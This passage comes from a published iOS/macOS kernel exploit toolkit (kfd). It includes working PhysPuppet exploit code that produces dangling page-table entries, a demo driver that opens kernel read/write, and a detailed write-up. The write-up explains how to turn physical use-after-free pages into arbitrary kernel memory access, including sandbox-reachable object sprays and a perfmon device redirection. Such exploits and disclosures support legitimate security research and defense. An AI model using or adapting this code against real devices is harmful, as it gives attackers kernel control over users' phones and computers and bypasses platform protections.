        if (address >= max_address) {
break;
        }

        // VM_FLAGS_FIXED: only count strides whose page was actually free.
        kern_return_t kret = vm_allocate(mach_task_self(), &address, pages(1), VM_FLAGS_FIXED);
        if (kret == KERN_SUCCESS) {
            memset((void*)(address), 'A', 1);
            addresses[given_ppl_pages] = address;
            if (++given_ppl_pages == given_ppl_pages_max) {
                break;
            }
        }
    }

    for (u64 i = 0; i < given_ppl_pages; i++) {
        assert_mach(vm_deallocate(mach_task_self(), addresses[i], pages(1)));
    }

    print_u64(given_ppl_pages);
    timer_end();
}

#endif /* puaf_h */
--------------------------------------------------------------------------------
/kfd/libkfd/puaf/physpuppet.h:
--------------------------------------------------------------------------------
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef physpuppet_h
#define physpuppet_h

// Deliberately unaligned named-entry size (2 pages + 1 byte) — the core of
// the physpuppet bug; the mapped entry covers [1 page, 3 pages) of it.
const u64 physpuppet_vmne_size = pages(2) + 1;
const u64 physpuppet_vme_offset = pages(1);
const u64 physpuppet_vme_size = pages(2);

void physpuppet_init(struct kfd* kfd)
{
    /*
     * Nothing to do.
     */
    return;
}

// Produce number_of_puaf_pages dangling L3 PTEs, one per loop iteration,
// recording each PUAF page's user VA in kfd->puaf.puaf_pages_uaddr.
void physpuppet_run(struct kfd* kfd)
{
    for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) {
        /*
         * STEP 1:
         *
         * Create a vm_named_entry. It will be backed by a vm_object with a
         * vo_size of 3 pages and an initial ref_count of 1.
         */
        mach_port_t named_entry = MACH_PORT_NULL;
        assert_mach(mach_memory_object_memory_entry_64(mach_host_self(), true, physpuppet_vmne_size, VM_PROT_DEFAULT, MEMORY_OBJECT_NULL, &named_entry));

        /*
         * STEP 2:
         *
         * Map the vm_named_entry into our vm_map. This will create a
         * vm_map_entry with a vme_start that is page-aligned, but a vme_end
         * that is not (vme_end = vme_start + 1 page + 1 byte). The new
         * vm_map_entry's vme_object is shared with the vm_named_entry, and
         * therefore its ref_count goes up to 2. Finally, the new vm_map_entry's
         * vme_offset is 1 page.
         */
        vm_address_t address = 0;
        assert_mach(vm_map(mach_task_self(), &address, (-1), 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR, named_entry, physpuppet_vme_offset, false, VM_PROT_DEFAULT, VM_PROT_DEFAULT, VM_INHERIT_DEFAULT));

        /*
         * STEP 3:
         *
         * Fault in both pages covered by the vm_map_entry. This will populate
         * the second and third vm_pages (by vmp_offset) of the vm_object. Most
         * importantly, this will set the two L3 PTEs covered by that virtual
         * address range with read and write permissions.
         */
        memset((void*)(address), 'A', physpuppet_vme_size);

        /*
         * STEP 4:
         *
         * Unmap that virtual address range. Crucially, when vm_map_delete()
         * calls pmap_remove_options(), only the first L3 PTE gets cleared. The
         * vm_map_entry is deallocated and therefore the vm_object's ref_count
         * goes down to 1.
         */
        assert_mach(vm_deallocate(mach_task_self(), address, physpuppet_vme_size));

        /*
         * STEP 5:
         *
         * Destroy the vm_named_entry. The vm_object's ref_count drops to 0 and
         * therefore is reaped. This will put all of its vm_pages on the free
         * list without calling pmap_disconnect().
         */
        assert_mach(mach_port_deallocate(mach_task_self(), named_entry));
        kfd->puaf.puaf_pages_uaddr[i] = address + physpuppet_vme_offset;

        /*
         * STEP 6:
         *
         * At this point, we have a dangling L3 PTE. However, there's a
         * discrepancy between the vm_map and the pmap. If not fixed, it will
         * cause a panic when the process exits. Therefore, we need to reinsert
         * a vm_map_entry in that virtual address range. We also need to fault
         * in the first page to populate the vm_object. Otherwise,
         * vm_map_delete() won't call pmap_remove_options() on exit. But we
         * don't fault in the second page to avoid overwriting our dangling PTE.
         */
        assert_mach(vm_allocate(mach_task_self(), &address, physpuppet_vme_size, VM_FLAGS_FIXED));
        memset((void*)(address), 'A', physpuppet_vme_offset);
    }
}

// Unmap every PUAF page except the two still backing the live kread/kwrite
// objects; those are released later by physpuppet_free().
void physpuppet_cleanup(struct kfd* kfd)
{
    u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr);
    u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr);

    for (u64 i = 0; i < kfd->puaf.number_of_puaf_pages; i++) {
        u64 puaf_page_uaddr = kfd->puaf.puaf_pages_uaddr[i];
        if ((puaf_page_uaddr == kread_page_uaddr) || (puaf_page_uaddr == kwrite_page_uaddr)) {
            continue;
        }

        assert_mach(vm_deallocate(mach_task_self(), puaf_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size));
    }
}

// Release the kread/kwrite PUAF pages kept alive through cleanup (once each,
// even when both objects share the same page).
void physpuppet_free(struct kfd* kfd)
{
    u64 kread_page_uaddr = trunc_page(kfd->kread.krkw_object_uaddr);
    u64 kwrite_page_uaddr = trunc_page(kfd->kwrite.krkw_object_uaddr);

    assert_mach(vm_deallocate(mach_task_self(), kread_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size));
    if (kwrite_page_uaddr != kread_page_uaddr) {
        assert_mach(vm_deallocate(mach_task_self(), kwrite_page_uaddr - physpuppet_vme_offset, physpuppet_vme_size));
    }
}

#endif /* physpuppet_h */
--------------------------------------------------------------------------------
/macos_kfd.c:
--------------------------------------------------------------------------------
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#define TARGET_MACOS 1
#include "kfd/libkfd.h"

// Demo driver: open a kfd handle with the smith PUAF method (2048 PUAF
// pages) and the sem_open-based kread/kwrite methods, then close it.
int main(void)
{
    u64 kfd = kopen(2048, puaf_smith, kread_sem_open, kwrite_sem_open);
    // At this point, kfd can be used with kread() and kwrite().
12 | kclose(kfd); 13 | } 14 | -------------------------------------------------------------------------------- /writeups/exploiting-puafs.md: -------------------------------------------------------------------------------- 1 | # Exploiting PUAFs 2 | 3 | --- 4 | 5 | ## Table of Contents 6 | 7 | - [What is a PUAF primitive?](#what-is-a-puaf-primitive) 8 | - [What to do before a PUAF exploit?](#what-to-do-before-a-puaf-exploit) 9 | - [What to do after a PUAF exploit?](#what-to-do-after-a-puaf-exploit) 10 | - [Impact of XNU mitigations on PUAF exploits](#impact-of-xnu-mitigations-on-puaf-exploits) 11 | - [Appendix: Discovery of the PUAF primitive](#appendix-discovery-of-the-puaf-primitive) 12 | 13 | --- 14 | 15 | ## What is a PUAF primitive? 16 | 17 | PUAF is an acronym for "physical use-after-free". As opposed to a normal UAF, which stems from a 18 | dangling pointer to a virtual address (VA), a PUAF originates from a dangling pointer to the 19 | physical address (PA) of a memory region. Although PA pointers could be stored in other kernel data 20 | structures, here it will be assumed that the dangling PA pointer is contained directly in a 21 | leaf-level page table entry (i.e. an L3 PTE in the case of iOS and macOS) from the page table 22 | hierarchy of the exploiting user process. In addition, in order to qualify as a PUAF primitive, it 23 | will also be assumed that the corresponding physical page has been put back on the free list. In 24 | XNU, every physical page of memory is represented by a `vm_page` structure, whose `vmp_q_state` 25 | field determines which queue the page is on, and whose `vmp_pageq` field contains 32-bit packed 26 | pointers to the next and previous pages in that queue. Note that the main "free list" in XNU is 27 | represented by `vm_page_queue_free`, which is an array of `MAX_COLORS` (128) queues (although the 28 | actual number of free queues used depends on the device configuration). 
Finally, although a dangling 29 | PTE with read-only access in the AP bits (e.g. [P0 issue 2337][1]) would still be considered an 30 | important security vulnerability, it would not be directly exploitable. Therefore, in this write-up, 31 | a PUAF primitive entails that the dangling PTE gives read/write access to user space in the AP bits. 32 | To summarize, in order to obtain a PUAF primitive, we must achieve a dangling L3 PTE with read/write 33 | access on a physical page which has been put back on the free list, such that the kernel can grab it 34 | and reuse it for absolutely anything! 35 | 36 | [1]: https://bugs.chromium.org/p/project-zero/issues/detail?id=2337 37 | 38 | --- 39 | 40 | ## What to do before a PUAF exploit? 41 | 42 | As mentioned above, once a PUAF primitive has been achieved, the corresponding physical pages could 43 | be reused for anything. However, if the higher-privileged Page Protection Layer (PPL) is running out 44 | of free pages in `pmap_ppl_free_page_list`, the regular kernel might grab pages from its own free 45 | queues and give them to PPL by calling `pmap_mark_page_as_ppl_page_internal()`. That said, this PPL 46 | routine will verify that the given page is indeed not mapped outside of the physical aperture, or 47 | else it will trigger a "page still has mappings" panic. But since a PUAF primitive requires a 48 | dangling PTE, this check would always fail and cause a kernel panic. Therefore, after obtaining PUAF 49 | pages, we must avoid marking them as PPL-owned. Hence, before starting a PUAF exploit, we should 50 | attempt to fill `pmap_ppl_free_page_list` as much as possible, such that PPL is less likely to run 51 | out of free pages during the critical section of the exploit. Fortunately, we can easily allocate 52 | PPL-owned pages by calling `vm_allocate()` with the flag `VM_FLAGS_FIXED` for all addresses aligned 53 | to the L2 block size inside the allowed VA range of our VM map. 
If there were previously no mappings 54 | in that L2 block size, then PPL will first need to allocate an L3 translation table to accommodate 55 | the new mapping. Then, we can simply deallocate those mappings and PPL will put the empty L3 56 | translation table pages back in `pmap_ppl_free_page_list`. This is done in the function 57 | `puaf_helper_give_ppl_pages()`, located in [puaf.h](../kfd/libkfd/puaf.h). 58 | 59 | On macOS, the maximum VA that is mappable by a user process (i.e. `current_map()->max_offset`) is 60 | quite high, such that we can fill the PPL page free list with an extremely large number of pages. 61 | However, on iOS, the maximum VA is much lower, such that we can only fill it with roughly 200 pages. 62 | Despite that, I almost never run into the "page still has mappings" panic, even when the exploit is 63 | configured to obtain 2048 PUAF pages, which works great for personal research. Please note that a 64 | higher number of PUAF pages makes it easier for the rest of the exploit to achieve a kernel 65 | read/write primitive. That said, for maximum reliability, if the PUAF exploit is repeatable (e.g. 66 | PhysPuppet), an attacker could instead obtain a PUAF primitive on a smaller number of pages, then 67 | attempt to get the kernel read/write primitive, and repeat the process as needed if the latter part 68 | did not succeed. 69 | 70 | --- 71 | 72 | ## What to do after a PUAF exploit? 73 | 74 | Let's suppose that we have successfully exploited a vulnerability to obtain a PUAF primitive on an 75 | arbitrary number of physical pages, now what? Note that free pages are added at the tail of the free 76 | queues by the `vm_page_queue_enter()` macro, but there is no way from user space to know exactly 77 | where our PUAF pages are going to be located in those free queues. In order to remedy that, we can 78 | do the following: 79 | 80 | 1. 
Run some code that will grab a few pages from the free queues and populate them with unique and 81 | recognizable content. 82 | 2. Scan all the PUAF pages for that recognizable content by reading through the dangling PTEs. 83 | 3. If we find the content, then we have reached the PUAF pages in one of the free queues, so we can 84 | move on to the next stage. Otherwise, we go back to step 1 to grab a few more pages, and we 85 | repeat this loop until we finally hit the PUAF pages. 86 | 87 | This stage of the exploit could probably be optimized tremendously to take into account the fact 88 | that `vm_page_queue_free` is made up of an array of free queues. However, as it stands, the exploit 89 | will simply grab free pages in chunks of 4 by calling `vm_copy()` on a purgeable source region, 90 | until a quarter of the PUAF pages have been successfully grabbed. This is a gross heuristic that 91 | completely wastes 25% of the PUAF pages, but it has worked exceedingly well for me, so I never had 92 | to optimize it further. This is done in the function `krkw_helper_grab_free_pages()`, located in 93 | [krkw.h](../kfd/libkfd/krkw.h), which I might upgrade in the future. 94 | 95 | Now that our PUAF pages are likely to be grabbed, we can turn the PUAF primitive into a more 96 | powerful kernel read/write primitive with the following high-level strategy: 97 | 98 | 1. Spray an "interesting" kernel object, such that it is reallocated in one of the remaining PUAF 99 | pages. 100 | 2. Scan the PUAF pages through the dangling PTEs for a "magic value" to confirm the successful 101 | reallocation and to identify exactly which PUAF page contains the target kernel object. 102 | 3. Overwrite a non-PAC'ed kernel pointer in the target kernel object with a fully controlled value, 103 | by directly overwriting it through the appropriate dangling PTE. 
It would also be possible to 104 | craft a set of fake kernel objects within the PUAF pages if necessary, but none of the methods 105 | described below require that. 106 | 4. Get a kernel read or kernel write primitive through a syscall that makes use of the overwritten 107 | kernel pointer. 108 | 109 | For example, in my original exploit for PhysPuppet, I was inspired by SockPuppet and decided to 110 | target socket-related objects. Thus, the generic steps listed above would map to the specific 111 | actions listed below: 112 | 113 | 1. Spray `inp_tp` structures with the `socket()` syscall. 114 | 2. Scan the PUAF pages for the magic value in the `t_keepintvl` field, which has been set with the 115 | `setsockopt()` syscall for the `TCP_KEEPINTVL` option. 116 | 3. Overwrite the `inp6_outputopts` field, which is a pointer to a `ip6_pktopts` structure. 117 | 4. Get a 4-byte kernel read primitive from `inp6_outputopts->ip6po_minmtu` with the `getsockopt()` 118 | syscall for the `IPV6_USE_MIN_MTU` option, and get a 4-byte kernel write primitive restricted to 119 | values between -1 and 255 from `inp6_outputopts->ip6po_tclass` with the `setsockopt()` syscall 120 | using the `IPV6_TCLASS` option. 121 | 122 | However, I was not really satisfied with this part of the exploit because the kernel write 123 | primitive was too restricted and the required syscalls (i.e. `socket()` and `[get/set]sockopt()`) 124 | are all denied from the WebContent sandbox. That said, when I found the vulnerability for Smith, 125 | which was exploitable from WebContent unlike PhysPuppet, I decided to look for other interesting 126 | target kernel objects which could be sprayed from the WebContent sandbox, such that the entire 127 | exploit satisfied that constraint. Unlike for the socket method described above, which used the same 128 | target kernel object for both the kernel read and write primitives, I ended up finding distinct 129 | objects for both primitives. 
130 | 131 | Here is the description of the 132 | [`kread_kqueue_workloop_ctl` method](../kfd/libkfd/krkw/kread/kread_kqueue_workloop_ctl.h): 133 | 134 | 1. Spray `kqworkloop` structures with the `kqueue_workloop_ctl()` syscall. 135 | 2. Scan the PUAF pages for the magic value in the `kqwl_dynamicid` field, which has been set 136 | directly by `kqueue_workloop_ctl()` above. 137 | 3. Overwrite the `kqwl_owner` field, which is a pointer to a `thread` structure. 138 | 4. Get an 8-byte kernel read primitive from `kqwl_owner->thread_id` with the `proc_info()` syscall 139 | for the `PROC_INFO_CALL_PIDDYNKQUEUEINFO` callnum. 140 | 141 | And here is the description of the [`kwrite_dup` method](../kfd/libkfd/krkw/kwrite/kwrite_dup.h): 142 | 143 | 1. Spray `fileproc` structures with the `dup()` syscall (to duplicate any file descriptor). 144 | 2. This time, no fields can be set to a truly unique magic value for the `fileproc` structure. 145 | Therefore, we scan the PUAF pages for the expected bit pattern of the entire structure. Then, we 146 | use the `fcntl()` syscall with the `F_SETFD` cmd to update the value of the `fp_flags` field to 147 | confirm the successful reallocation and to identify exactly which file descriptor owns that 148 | `fileproc` object. 149 | 3. Overwrite the `fp_guard` field, which is a pointer to a `fileproc_guard` structure. 150 | 4. Get an 8-byte kernel write primitive from `fp_guard->fpg_guard` with the `change_fdguard_np()` 151 | syscall. However, that method cannot overwrite a value of 0, nor overwrite any value to 0. 152 | 153 | This worked well enough, and at the time of writing, all the syscalls used by those methods are part 154 | of the WebContent sandbox. However, although the `proc_info()` syscall is allowed, the 155 | `PROC_INFO_CALL_PIDDYNKQUEUEINFO` callnum is denied. Therefore, I had to find another kernel read 156 | primitive. 
Fortunately, it was pretty easy to find one by looking at the other callnums of 157 | `proc_info()` which are allowed by the WebContent sandbox. 158 | 159 | Here is the description of the [`kread_sem_open` method](../kfd/libkfd/krkw/kread/kread_sem_open.h): 160 | 161 | 1. Spray `psemnode` structures with the `sem_open()` syscall. 162 | 2. Once again, no fields can be set to a truly unique magic value for the `psemnode` structures. 163 | Therefore, we scan the PUAF pages for four consecutive structures, which should contain the same 164 | `pinfo` pointer in the first 8 bytes and zero padding in the second 8 bytes. Then, we increment 165 | the `pinfo` pointer by 4 through the dangling PTE and we use the `proc_info()` syscall to 166 | retrieve the name of the posix semaphore, which should now be shifted by 4 characters when we hit 167 | the right file descriptor. 168 | 3. Overwrite the `pinfo` field, which is a pointer to a `pseminfo` structure. 169 | 4. Get an 8-byte kernel read primitive from `pinfo->psem_uid` and `pinfo->psem_gid` with the 170 | `proc_info()` syscall for the `PROC_INFO_CALL_PIDFDINFO` callnum, which is not denied by the 171 | WebContent sandbox. 172 | 173 | Please note that `shm_open()`, which is also part of the WebContent sandbox, could also be used to 174 | achieve a kernel read primitive, in much the same way as `sem_open()`. However, `sem_open()` makes 175 | it easier to determine the address of `current_proc()` through the semaphore's `owner` field. 176 | Lastly, the [`kwrite_sem_open` method](../kfd/libkfd/krkw/kwrite/kwrite_sem_open.h) works just like 177 | the `kwrite_dup` method, but the `fileproc` structures are sprayed with the `sem_open()` syscall 178 | instead of the `dup()` syscall. 
179 | 180 | At this point, we have a decent kernel read/write primitive, but there are some minor encumbrances: 181 | 182 | - The kernel read primitive successfully reads 8 bytes from `pinfo->psem_uid` and `pinfo->psem_gid`, 183 | but it also reads other fields of the `pseminfo` structure located before and after those two. 184 | This can cause problems if the address we want to read is located at the very beginning of a page. 185 | In that case, the fields before `psem_uid` and `psem_gid` would end up in the previous virtual 186 | page, which might be unmapped and therefore cause a "Kernel data abort" panic. Of course, in such 187 | a case, we could use a variant that is guaranteed to not underflow a page by using the first bytes 188 | read from the modified kernel pointer. This is done in the function `kread_sem_open_kread_u32()`. 189 | - The kernel write primitive cannot overwrite a value of 0, nor overwrite any value to 0. There are 190 | simple workarounds for both scenarios. For example, the function `smith_helper_cleanup()` uses 191 | such a workaround to overwrite a value of 0. The workaround to overwrite a value to 0 is left as 192 | an exercise for the reader. 193 | 194 | Although we can overcome these impediments easily, it would be nice to bootstrap a better kernel 195 | read/write from those initial primitives. This is achieved in [perf.h](../kfd/libkfd/perf.h), 196 | but libkfd only supports this part of the exploit on the iPhone 14 Pro Max for certain versions 197 | of iOS (see the supported versions in the function `perf_init()`). Currently, I am using some static 198 | addresses from those kernelcaches to locate certain global kernel objects (e.g. `perfmon_devices`), 199 | which cannot be found easily by chasing data pointers. It would probably be possible to achieve the 200 | same outcome dynamically by chasing offsets in code, but this is left as an exercise for the reader 201 | for now. 
As it stands, here is how the setup for the better kernel read/write is achieved: 202 | 203 | 1. We call `vm_allocate()` to allocate a single page, which will be used as a shared buffer between 204 | user space and kernel space later on. Note that we also call `memset()` to fault in that virtual 205 | page, which will grab a physical page and populate the corresponding PTE. 206 | 2. We call `open("/dev/aes_0", O_RDWR)` to open a file descriptor. Please note that we could open 207 | any character device which is accessible from the target sandbox, because we will corrupt it 208 | later on to redirect it to `"/dev/perfmon_core"` instead. 209 | 3. We use the kernel read primitive to obtain the slid address of the function `vn_kqfilter()` by 210 | chasing the pointers `current_proc()->p_fd.fd_ofiles[fd]->fp_glob->fg_ops->fo_kqfilter`, where 211 | "fd" is the opaque file descriptor returned by the `open()` syscall in the previous step. 212 | 4. We calculate the kernel slide by subtracting the slid address of the function `vn_kqfilter()` 213 | with the static address of that function in the kernelcache. We then make sure that the base of 214 | the kernelcache contains the expected Mach-O header. 215 | 5. We use the kernel read primitive to scan the `cdevsw` array until we find the major index for 216 | `perfmon_cdevsw`, which seems to always be 0x11. 217 | 6. From the `fileglob` structure we found earlier, we use the kernel read primitive to retrieve the 218 | original `dev_t` from `fg->fg_data->v_specinfo->si_rdev` and we use the kernel write primitive to 219 | overwrite it such that it indexes into `perfmon_cdevsw` instead. In addition, the `si_opencount` 220 | field is incremented by one to prevent `perfmon_dev_close()` from being called if the process 221 | exits before calling `kclose()`, which would trigger a "perfmon: unpaired release" panic. 222 | 7. 
We use the kernel read primitive to retrieve a bunch of useful globals (`vm_pages`, 223 | `vm_page_array_beginning_addr`, `vm_page_array_ending_addr`, `vm_first_phys_ppnum`, `ptov_table`, 224 | `gVirtBase`, `gPhysBase` and `gPhysSize`) as well as TTBR0 from `current_pmap()->ttep` and TTBR1 225 | from `kernel_pmap->ttep`. 226 | 8. We can then manually walk our page tables starting from TTBR0 to find the physical address of the 227 | shared page allocated in step 1. And since we retrieved the `ptov_table` in the previous step, we 228 | can then use `phystokv()` to find the kernel VA for that physical page inside the physmap. 229 | 9. Finally, we use the kernel write primitive to corrupt the `pmdv_config` field of the first 230 | perfmon device to point to the shared page (i.e. with the kernel VA retrieved in the previous 231 | step), and to set the `pmdv_allocated` boolean field to `true`. 232 | 233 | At this point, the setup is complete. To read kernel memory, we can now craft a `perfmon_config` 234 | structure in the shared page, as shown in the image below, then use the `PERFMON_CTL_SPECIFY` ioctl 235 | to read between 1 and 65535 bytes from an arbitrary kernel address. In addition, note that the 236 | region being read must satisfy the `zone_element_bounds_check()` in `copy_validate()`, because this 237 | technique uses `copyout()` under the hood. 238 | 239 | ![exploiting-puafs-figure1.png](figures/exploiting-puafs-figure1.png) 240 | 241 | To write kernel memory, we can now craft a `perfmon_config`, `perfmon_source` and `perfmon_event` 242 | structure in the shared page, as shown in the image below, then use the `PERFMON_CTL_ADD_EVENT` 243 | ioctl to write 8 bytes to an arbitrary kernel address. That said, at that point, `kwrite()` can 244 | accept any size that is a multiple of 8 because it will perform this technique in a loop. 
245 | 246 | ![exploiting-puafs-figure2.png](figures/exploiting-puafs-figure2.png) 247 | 248 | Finally, on `kclose()`, the function `perf_free()` will restore the `si_rdev` and `si_opencount` 249 | fields to their original values, such that all relevant kernel objects are cleaned up properly when 250 | the file descriptor is closed. However, if the process exits before calling `kclose()`, this cleanup 251 | will be incomplete and the next attempt to `open("/dev/aes_0", O_RDWR)` will fail with `EMFILE`. 252 | Therefore, it would be cleaner to use the kernel write primitive to "manually" close the 253 | device-specific kernel objects of that file descriptor, such that the process could exit at any 254 | moment and still leave the kernel in a clean state. For now, this is left as an exercise for the 255 | reader. 256 | 257 | --- 258 | 259 | ## Impact of XNU mitigations on PUAF exploits 260 | 261 | So, how effective were the various iOS kernel exploit mitigations at blocking the PUAF technique? 262 | The mitigations I considered were KASLR, PAN, PAC, PPL, `zone_require()`, and `kalloc_type()`: 263 | 264 | - KASLR does not really impact this technique since we do not need to leak a kernel address in order 265 | to obtain the PUAF primitive in the first place. Of course, we eventually want to obtain the 266 | addresses of the kernel objects that we want to read or write, but at that point, we have endless 267 | possibilities of objects to spray inside the PUAF pages in order to gather that information. 268 | - PAN also does not really have an impact on this technique. Although none of the kread and kwrite 269 | methods I described above required us to craft a set of fake kernel objects, other methods could. 270 | In that case, the absence of PAN would be useful. However, in practice, there are plenty of 271 | objects that could leak the address of the PUAF pages in kernel space, such that we could craft 272 | those fake objects directly in those PUAF pages. 
273 | - PAC as a form of control flow integrity is completely irrelevant for this technique as it is a 274 | form of data-only attack. That said, in my opinion, PAC for data pointers is the mitigation that 275 | currently has the biggest impact on this technique, because there are a lot more kernel objects 276 | that we could target in order to obtain a kernel read/write primitive if certain members of those 277 | structures had not been signed. 278 | - PPL surprisingly does very little to prevent this technique. Of course, it prevents the PUAF pages 279 | from being reused as page tables and other PPL-protected structures. But in practice, it is very 280 | easy to dodge the "page still has mappings" panic and to reuse the PUAF pages for other 281 | interesting kernel objects. I expect this to change! 282 | - `zone_require()` has a similar impact as data-PAC for this technique, by preventing us from 283 | forging kernel pointers inside the PUAF pages if they are verified with this function. 284 | - `kalloc_type()` is completely irrelevant for this technique as it only provides protection against 285 | virtual address reuse, as opposed to physical address reuse. 286 | 287 | --- 288 | 289 | ## Appendix: Discovery of the PUAF primitive 290 | 291 | First of all, I want to be clear that I do not claim to be the first researcher to discover this 292 | primitive. As far as I know, Jann Horn of Google Project Zero was the first researcher to publicly 293 | report and disclose dangling PTE vulnerabilities: 294 | 295 | - [P0 issue 2325][2], reported on June 29, 2022 and disclosed on August 24, 2022. 296 | - [P0 issue 2327][3], reported on June 30, 2022 and disclosed on September 19, 2022. 297 | 298 | In addition, TLB flushing bugs could be considered a variant of the PUAF primitive, which Jann Horn 299 | found even earlier: 300 | 301 | - [P0 issue 1633][4], reported on August 15, 2018 and disclosed on September 10, 2018. 
302 | - [P0 issue 1695][5], reported on October 12, 2018 and disclosed on October 29, 2018. 303 | 304 | For iOS, I believe Ian Beer was the first researcher to publicly disclose a dangling PTE 305 | vulnerability, although with read-only access: 306 | 307 | - [P0 issue 2337][6], reported on July 29, 2022 and disclosed on November 25, 2022. 308 | 309 | Please note that other researchers might have found similar vulnerabilities earlier, but these are 310 | the earliest ones I could find. I reported PhysPuppet to Apple a bit before Ian Beer's issue was 311 | disclosed to the public and, at that time, I was not aware of Jann Horn's research. Therefore, in 312 | case it is of interest to other researchers, I will share how I stumbled upon this powerful 313 | primitive. When I got started doing vulnerability research, during the first half of 2022, I found 314 | multiple buffer overflows in the SMBClient kernel extension and a UAF in the in-kernel NFS client 315 | (i.e. a normal UAF that reuses a VA and not a PA). However, given that I was pretty inexperienced 316 | with exploitation back then and that Apple had already delivered a lot of mitigations for classical 317 | memory corruption vulnerabilities, I had no idea how to exploit them. My proofs-of-concept would 318 | only trigger "one-click" remote kernel panics, but that quickly became unsatisfying. Therefore, 319 | during the second half of 2022, I decided to look for better logic bugs in the XNU kernel. In 320 | particular, I was inspired to attack physical memory by Brandon Azad's blog post 321 | [One Byte to rule them all][7]. That said, his technique required a one-byte linear heap overflow 322 | primitive (amongst other things) to gain the arbitrary physical mapping primitive. But I was 323 | determined to avoid memory corruption, so I decided to look for other logic bugs that could allow a 324 | user process to control the physical address entered in one of its own PTEs. 
After spending a lot of 325 | time reading and re-reading the VM map and pmap code, I eventually came to the conclusion that 326 | obtaining an arbitrary physical mapping primitive as an initial primitive would be unrealistic. 327 | Fortunately, I got incredibly lucky right after that! 328 | 329 | As I was perusing the code in `vm_map.c` for the thousandth time, I was struck by just how many 330 | functions would assert that the start and end addresses of a `vm_map_entry` structure are 331 | page-aligned (e.g. in `vm_map_enter()`, `vm_map_entry_insert()`, `vm_map_entry_zap()`, and many 332 | other functions). Given that those assertions are not enabled in release builds, I was curious to 333 | know what would happen if we could magically create an "unaligned entry" in our VM map? For example, 334 | if the `vme_start` field was equal to a page-aligned address A but the `vme_end` field was equal to 335 | A + PAGE_SIZE + 1, how would the functions `vm_fault()` and `vm_map_delete()` behave? To my 336 | astonishment, I realized that this condition would trivially lead to a dangling PTE. That said, at 337 | that point in time, this was just an idea, albeit a very promising one! Therefore, I went on to look 338 | for logic bugs that could allow an attacker to create such an unaligned entry. First, I investigated 339 | all the attack surface that was reachable from the WebContent sandbox but I was not able to find one. 340 | However, after giving up on a vulnerability reachable from WebContent, I quickly came across the MIG 341 | routine `mach_memory_object_memory_entry_64()` and found the vulnerability for PhysPuppet, which is 342 | covered in detail in a separate [write-up](physpuppet.md). 343 | 344 | After that, I checked online for existing exploits that achieved a PUAF primitive. At that time, I 345 | could not find any for iOS but that is when I stumbled upon Jann Horn's Mali issues. 
As a quick 346 | aside, I also skimmed his blog post about [exploiting a simple Linux memory corruption bug][8], 347 | which I mistakenly thought was a variant of the PUAF primitive with a dangling PTE in kernel space 348 | rather than user space. I later realized that this was just a normal UAF, but I got confused because 349 | he exploited it through the page allocator by reallocating the victim page as a page table. That 350 | said, I knew this would not be possible on iOS because of the formidable PPL. However, as I was 351 | already familiar with Ned Williamson's [SockPuppet exploit][9], I had a pretty solid hunch that I 352 | could exploit the dangling PTEs by reallocating socket-related objects inside the PUAF pages, then 353 | by using the `getsockopt()`/`setsockopt()` syscalls in order to obtain the kernel read/write 354 | primitives, respectively. 355 | 356 | [2]: https://bugs.chromium.org/p/project-zero/issues/detail?id=2325 357 | [3]: https://bugs.chromium.org/p/project-zero/issues/detail?id=2327 358 | [4]: https://bugs.chromium.org/p/project-zero/issues/detail?id=1633 359 | [5]: https://bugs.chromium.org/p/project-zero/issues/detail?id=1695 360 | [6]: https://bugs.chromium.org/p/project-zero/issues/detail?id=2337 361 | [7]: https://googleprojectzero.blogspot.com/2020/07/one-byte-to-rule-them-all.html 362 | [8]: https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html 363 | [9]: https://googleprojectzero.blogspot.com/2019/12/sockpuppet-walkthrough-of-kernel.html 364 | -------------------------------------------------------------------------------- /writeups/figures/exploiting-puafs-figure1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/exploiting-puafs-figure1.png -------------------------------------------------------------------------------- 
/writeups/figures/exploiting-puafs-figure2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/exploiting-puafs-figure2.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure1.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure2.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure3.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure4.png -------------------------------------------------------------------------------- /writeups/figures/physpuppet-figure5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/kfd-exploit/e6e3d3ca989225205d9bd6073d035be6e862d8cd/writeups/figures/physpuppet-figure5.png 
